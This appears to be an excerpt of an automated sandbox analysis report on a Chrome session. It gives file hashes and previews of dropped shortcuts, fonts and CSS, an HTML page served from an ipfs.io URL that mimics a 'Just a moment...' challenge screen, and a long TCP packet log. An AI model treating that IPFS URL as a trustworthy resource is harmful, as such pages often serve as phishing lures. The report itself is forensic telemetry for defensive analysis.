SHA-256:	84E66B396944551FC8D6D6B13BB3501EA56419D70B28C3C6C50DE41CD6406C33
SHA-512:	6032A3A79889674A3A2929A9D4FAE61174DF16F1385523D65506CD6FF1C2F6F1600547AAF89D2CB147418328895431253040C4EB306CBB596B80557416EF3BE1
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....'.r.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XtG....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XtG....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XtG....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XtG..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XxG...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 07:59:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.988942631331056
Encrypted:	false
SSDEEP:	48:8YdiTuakH+idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbuy+yT+:8d/2T/TbxWOvTbuy7T
MD5:	AC351DCF91C80F91FBD04168838F5E9C
SHA1:	33F6AFBF59D1D34B331CA533F0EBE830F4313EAD
SHA-256:	8270921A7EFB9189069374F69135473155C8DBC200AB8E53D251D5F901C5172C
SHA-512:	89D5674E9DE4D24CAE59F46F836EDA17CEF73A62188946826BA410EF723BD1C1CCF884F09A04126E936956496748F603AB2F28DA34F430D9DC137A4BC055AAD4
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......_.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XtG....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XtG....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XtG....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XtG..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XxG...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 59

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4633), with no line terminators
Category:	downloaded
Size (bytes):	4633
Entropy (8bit):	5.11612899370178
Encrypted:	false
SSDEEP:	96:845fmI0oTiODSC5QIPUcDOR7xpOlyocF4RkVCI6W:8OfmIPDSC5QWOR7xpUiOkVCI6W
MD5:	4759EEC5181FB70BD7C8574BF80024F9
SHA1:	BBBAC228FF60397D49E7C6B62D4D568843F0BB31
SHA-256:	27DE8659031A8FD690880BFBD9E905FD5F94A7EFF36D89CF48504D3E9F87825D
SHA-512:	F0CAA2B1B212D25562FE0D2CE681B8295927908E94EE34E4647F528B6477860D079A6CF5786B82E49E4C403FAA17D9D23718FF7BD148C0BC6223197FF5A9167D
Malicious:	false
Reputation:	low
URL:	https://www.gstatic.com/recaptcha/releases/moV1mTgQ6S91nuTnmll4Y9yf/demo__ltr.css
Preview:	@import url(//fonts.googleapis.com/css?family=Roboto:300);html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl,dt,dd,ol,ul,li{margin:0;padding:0;border:0;outline:0;font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;vertical-align:baseline}fieldset{margin:0;outline:0;font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;vertical-align:baseline}form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td{margin:0;padding:0;border:0;outline:0;font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;vertical-align:baseline}fieldset{border:1px solid #ebebeb;padding:16px}form label{display:block;line-height:29px}form ul li{margin-bottom:10px}input{font-family:Roboto,helvetica,arial,sans-serif;font-size:14px}ul{list-style:none}.sample-form{width:335px;padding:16px}.recaptcha-error{border:1px solid #dd4b39;padding:5px}.recaptcha-error-message{

Chrome Cache Entry: 60

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (56804)
Category:	downloaded
Size (bytes):	152508
Entropy (8bit):	5.701854171003312
Encrypted:	false
SSDEEP:	3072:W3Qa30iCEAaVupOdkiA4Cwx78InO2mZuy6Nz:W31upskiAobnO2mAy2
MD5:	35E862DBA0E5333C7BCB69FBB8DE543C
SHA1:	15057E4561FB2D40E9083F9A453C3A71A8EF5658
SHA-256:	4D7FED4F1018A09DC9FDC1FB9E0741C502725B1BB9AE9AB2B7CEE3491E378B32
SHA-512:	0DB126DFFA8E790D473ABC7B2476D1AB6B406AA915FA1A12273944D44BA503915E15935958F47EBE9199C5B7B2F460B55E6FB0555C132D85163BE9BE200C0FB7
Malicious:	false
Reputation:	low
URL:	https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN
Preview:	..<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>. <meta http-equiv="X-UA-Compatible" content="IE=Edge"/>. <meta name="viewport" content="width=device-width,initial-scale=1">. <meta name="robots" content="noindex, nofollow, noarchive">. <title>Just a moment...</title>. <style>. #dm{font-weight:800; font-size:35px;}span.ctp-label{padding-left:5px}.challenge-container,.challenge-item{align-items:center;display:flex}*,::after,::before{box-sizing:border-box;margin:0;padding:0;position:relative;font-weight:400;outline:0;border:none}body{color:#313131;line-height:1.5;font-size:16px;font-weight:400;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}h1{font-size:2.5rem;font-weight:500}h2{font-size:1.4rem}main{margin:8re

Chrome Cache Entry: 61

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 15740, version 1.0
Category:	downloaded
Size (bytes):	15740
Entropy (8bit):	7.9866977438851
Encrypted:	false
SSDEEP:	384:RRlYHoE1mbF2cZgh17dAdJ0mB1cpOxvLTcZjh1LOz:JYIB2Sg/dYui1XBHwG
MD5:	B9C29351C46F3E8C8631C4002457F48A
SHA1:	E57E59C5780995FF2937AB2B511A769212974A87
SHA-256:	F75911313E1C7802C23345AB57E754D87801581706780C993FB23FF4E0FE62EF
SHA-512:	487AC3FD483F8EA131989857BCF1782C295AC72022BC2EBD4BF19001433D6DB65000E192E58B7A6F70F627D15C58F9FED9BA5FE0216363354BEC5A396299DAD9
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4.woff2
Preview:	wOF2......=\|.......l..=..........................d..d..^.`.. .X..<.....x..s........6.$.... ..\|. ..:.(..l.V38.......;..'....F.........)..!B..V..U......;..q....O#..cx..mt.w[.......x.UG\|n}........]k[....;J.....<=..F.$'/.......w...r$`....b(g..9C4....#.BK..G..9".Q...ld...j..C.l.F.i#.+.UO...%.E.Z..C..."......k1._....M.Y....-..H......Gm3.....YiJ.s..b..>..W..U.."..2..-.O........(H...0$....7l.7}.j...".C...w?/.oB%<K..d...'H....M]...k.."...E_k.............8.\...A.1U.9 5.@Jb.)J....Hkb ....!.n._.s.:5E......k..}.^...7]f.,a.7..a.H...J^.~...uWJ),....Z.7A..Ra:..k...}.R....G k$.{...%...R...."X6...A......p..V..IH[... .m..H.q.x.?\|......b.#:.c..Z.V.}..:P$j..c..B..^...HH......?......=.#^ q.@R...I....#.$O.H.N03~.@`...........8e.......>!...d..I.........g<)2......P....u..V.........c.1sK.."G.#...^;....=w....[G.}k.y.?.........c.a..\9f..zx..("mGj.."...d..........>c.!..Z.xm...=....v.V..:.6s.....J.oz#.....Y"d.....6>1...i...IQ..;2......\d......n..y....K..Y.L...O.2.....

Chrome Cache Entry: 62

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	2190
Entropy (8bit):	5.379739749404308
Encrypted:	false
SSDEEP:	48:1OWNalOWNJFZKOWNPOWNO3yOWNtAOWNeRVc+umOWNhN0oD:1OWNalOWNJFZKOWNPOWNO3yOWN+OWNS9
MD5:	A836A503574CA8049144CE0F91323B1F
SHA1:	BEBB999E6080AC870FC8E8530BD3161F0292407E
SHA-256:	94BD3BD035DD4F59E16DD14EE9D7F60A836A86D11C788F6CEB886C4B47893C78
SHA-512:	1ED199E5F7C667F8CE7364532F020FAD3A7ABA9F96F0CD874769C97F9244A4A68615ED92D7299580D75EBDB289431BDC489A2CF7149D8D76399161B4B52DEC6B
Malicious:	false
Reputation:	low
URL:	https://fonts.googleapis.com/css?family=Roboto:300
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2) format('woff2');. unicode-ra

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 10:59:39.096560955 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 26, 2024 10:59:39.097637892 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 26, 2024 10:59:39.190289974 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 26, 2024 10:59:47.419393063 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.419428110 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.419500113 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.419976950 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.420021057 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.420079947 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.420252085 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.420262098 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.420406103 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.420423031 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.683936119 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.684201956 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.684228897 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.685116053 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.685180902 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.690819979 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.690901041 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.691270113 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.691278934 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.695756912 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.696113110 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.696125984 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.697710037 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.697805882 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.699006081 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.699089050 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:47.833707094 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.845001936 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:47.845016956 CEST	443	49709	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.045337915 CEST	49709	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.078682899 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.078747034 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.078778028 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.078820944 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.078830957 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.078866959 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.078886986 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.078938007 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.078978062 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.078985929 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.079063892 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.079102993 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.079108953 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.099986076 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.100172997 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.100203991 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.100238085 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.100311995 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.100332975 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.100610018 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.100636005 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.100651979 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.100656986 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.100666046 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.100694895 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.101330996 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.101367950 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.101382017 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.101387978 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.101428032 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.101433039 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.102190971 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.102243900 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.102248907 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.102381945 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.102425098 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.102431059 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.103077888 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.103100061 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.103127003 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.103135109 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.103178978 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.103183985 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104013920 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104037046 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104064941 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104065895 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.104072094 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104110956 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.104118109 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104156017 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.104172945 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104868889 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104912043 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.104918003 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104957104 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.104998112 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.105003119 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.105782986 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.105806112 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.105830908 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.105838060 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.105874062 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.106625080 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.106689930 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.177124977 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:48.177218914 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:48.177329063 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:48.177503109 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:48.177525043 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:48.203644037 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.203757048 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.203927994 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.204030037 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.224952936 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.225047112 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.225836992 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.225892067 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.226017952 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.226064920 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.226316929 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.226377964 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.227230072 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.227286100 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.227425098 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.227482080 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.228498936 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.228571892 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.228749990 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.228806019 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.230153084 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.230211973 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.230295897 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.230339050 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.230438948 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.230483055 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.231695890 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.231754065 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.231889963 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.231935978 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.232258081 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.232315063 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.273318052 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.273415089 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.273514032 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.273570061 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.328723907 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.328825951 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.328906059 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.328923941 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.328942060 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.328959942 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.328968048 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.328977108 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.329015017 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.329807997 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.329890013 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.330533981 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.330610037 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.330616951 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.330678940 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.330698967 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.330741882 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.331137896 CEST	49710	443	192.168.2.5	209.94.90.1
Apr 26, 2024 10:59:48.331155062 CEST	443	49710	209.94.90.1	192.168.2.5
Apr 26, 2024 10:59:48.505502939 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:48.505786896 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:48.505852938 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:48.506725073 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:48.506798983 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:48.507786989 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:48.507850885 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:48.644843102 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:48.644902945 CEST	443	49713	192.178.50.36	192.168.2.5
Apr 26, 2024 10:59:48.840967894 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 26, 2024 10:59:48.841006994 CEST	49713	443	192.168.2.5	192.178.50.36
Apr 26, 2024 10:59:48.872184992 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 26, 2024 10:59:48.872186899 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 26, 2024 10:59:50.071686029 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.071829081 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.071933031 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.074229002 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.074259043 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.240320921 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 26, 2024 10:59:50.240436077 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 26, 2024 10:59:50.340476990 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.340569019 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.344558954 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.344578981 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.344917059 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.387605906 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.443643093 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.484148979 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.595149040 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.595243931 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.595352888 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.595479965 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.595513105 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.595552921 CEST	49716	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.595570087 CEST	443	49716	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.631069899 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.631128073 CEST	443	49718	23.193.120.112	192.168.2.5
Apr 26, 2024 10:59:50.631206036 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.643552065 CEST	49718	443	192.168.2.5	23.193.120.112
Apr 26, 2024 10:59:50.643582106 CEST	443	49718	23.193.120.112	192.168.2.5
